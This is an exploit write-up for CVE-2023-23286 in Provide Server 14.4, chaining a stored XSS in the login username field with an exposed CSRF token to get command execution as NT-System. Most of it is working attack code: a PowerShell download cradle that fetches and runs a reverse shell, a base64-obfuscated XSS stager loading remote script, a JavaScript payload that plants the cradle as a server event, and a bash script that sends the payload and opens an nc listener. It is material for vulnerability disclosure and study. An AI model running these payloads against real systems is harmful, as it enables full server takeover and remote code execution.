Provide Server 14.4 XSS / Cross Site Request Forgery / Code Execution

`Provide Server v. 14.4  
CVE-2023-23286  
Vulnerabilities:  
CWE-79: Improper Neutralization of Input During Web Page Generation  
  
Unauthenticated stored XSS in server-log delivered via username field from login-form  
CWE-352: Cross-Site Request Forgery  
  
CSRF-token exposed in javascript, making it possible to obtain a valid CSRF-Token and use it in XMLHTTPRequests. This vulnerability allows an attacker to add a task that runs commands on the server as "NT-System" Impact:  
  
An attacker could exploit the unauthenticated stored XSS vulnerability by injecting malicious code into the login form's username field. When the server-log is viewed, the malicious code will be executed, potentially allowing the attacker to steal user data or execute further attacks.  
By exploiting the CSRF vulnerability, an attacker could add a task to the server that runs commands with NT-System privileges. This could potentially allow the attacker to take complete control of the server, access sensitive data, or disrupt service.  
  
Proof Of Consept  
RCE via XSS and CSRF  
  
The attacker places the staged XSS into the username field and sends the login request. This will place the XSS stager in the server log and trigger when a administrator opens the log.  
The XSS stager downloads and runs the XSS payload. The payload will add a task that runs the powershell downloadcradle every time someone connects to the server. Even unauthenticated connections.  
The powershell-script downloaded in this example is a reverse shell, connecting back to the attacker. As the task runs as NT System on the server, the attacker will have full controll on the server.  
  
Powershell Downloadcradle  
  
PowerShell -noprofile -executionpolicy bypass "Start-process powershell.exe -argumentlist '-window hidden -noexit Start-Job { IEX(IWR https://example.com/rev.ps1 -UseBasicParsing) }'";exit  
Staged XSS  
  
<img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZXhhbXBsZS5jb20veHNzLmpzIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw src=https://example.com/1 onload=eval(atob(this.id))>  
XSS payload  
  
  
  
var vhost = window.location.protocol+'\/\/'+window.location.host  
var csrf_token = document.querySelector("meta[name='csrf-token']").getAttribute("content")  
, o = XMLHttpRequest.prototype.open;  
XMLHttpRequest.prototype.open = function(a, b) {  
var c = o.apply(this, arguments);  
return (b.startsWith("/") || b.startsWith(window.location.origin)) && this.setRequestHeader("X-CSRF-Token", csrf_token),  
c  
}  
  
  
  
fetch(vhost+'/ajax/SetEventsAndMessages',{  
method: 'POST',  
headers: {  
'Content-Length': '3845',   
'Sec-Ch-Ua': '"Not?A_Brand";v="8", "Chromium";v="108", "Microsoft Edge";v="108"',   
'X-Csrf-Token': csrf_token,   
'Sec-Ch-Ua-Mobile': '?0',   
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Edg/108.0.1462.54',   
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',   
'Accept': 'application/json, text/javascript, */*; q=0.01',   
'X-Requested-With': 'XMLHttpRequest',   
'Sec-Ch-Ua-Platform': '"macOS"',   
'Origin': vhost,   
'Sec-Fetch-Site': 'same-origin',   
'Sec-Fetch-Mode': 'cors',   
'Sec-Fetch-Dest': 'empty',   
'Accept-Encoding': 'gzip, deflate',   
'Accept-Language': 'en-US,en;q=0.9,nb;q=0.8,no;q=0.7,en-GB;q=0.6',   
'Connection': 'close'  
},  
credentials: 'include',  
body: '%7B%22MsgOnCreateDirectory%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgOnUploadStart%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22File+status+okay;+about+to+open+data+connection.%22%7D,%22MsgOnUploadEnd%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Closing+data+connection.%22%7D,%22MsgOnDownloadEnd%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Closing+data+connection.%22%7D,%22MsgOnRemoveDirectory%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgBeforeCreateDirectory%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgBeforeRename%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgBeforeRemoveDirectory%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnQuit%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Goodbye.%22%7D,%22MsgOnCopy%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgOnDownloadStart%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22File+status+okay;+about+to+open+data+connection.%22%7D,%22MsgBeforeUpload%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnListDirectoryEnd%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Closing+data+connection.%22%7D,%22MsgBeforeLoggedIn%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Login+not+accepted%22%7D,%22MsgOnRename%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgBeforeConnect%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Not+connected,+access+denied.+Please+don\'t+hammer.%22%7D,%22MsgBeforeDownload%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnChangeDirectory%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22CWD+Command+successful.%22%7D,%22MsgOnConnect%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22%25EXECUTE(PowerShell++-noprofile+-executionpolicy+bypass+%5C%22Start-process+powershell.exe+-argumentlist+\'-window+hidden+-noexit+Start-Job+-ScriptBlock+%7B+IEX(IWR+https://example.com/rev.ps1+-UseBasicParsing)+%7D\'%5C%22;exit)%25%22%7D,%22MsgOnListDirectoryStart%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Opening+connection+for+/bin/ls.%22%7D,%22MsgBeforeRemoveFile%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgBeforeChangeDirectory%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnDisconnect%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22%22%7D,%22MsgOnRemoveFile%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgBeforeCopy%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgBeforeListDirectory%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnLoggedIn%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22User+logged+in,+proceed.%22%7D%7D'  
});  
  
window.location.href = vhost;  
fetch(vhost.replace(':8443',''))  
  
  
  
  
Bash script for running exploit  
  
  
#!/bin/bash  
echo "Sending payload"  
host=$1  
  
if [ "$2" == "trigger" ]  
then  
curl -s -k https://$1 >/dev/null  
else  
  
curl -i -s -k $'POST' -H $host -H $'Content-Length: 262' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-User: ?1' -H $'Sec-Fetch-Dest: document' -H "Referer: https://$host" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9,nb;q=0.8,no;q=0.7,en-GB;q=0.6' -H $'Connection: close' --data-binary $'path=%2F&username=%3Cimg+id%3DdmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vZjIwLmJlL2FsZXJ0Mi5qcyI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs%3D+src%3Dhttps%3A%2F%2Ff20.be%2F1+onload%3Deval%28atob%28this.id%29%29%3E&password=&logon=Log+in' "https://$host" > /dev/null  
clear  
fi  
echo "Waiting..."  
rlwrap nc -lvnp 5555  
  
`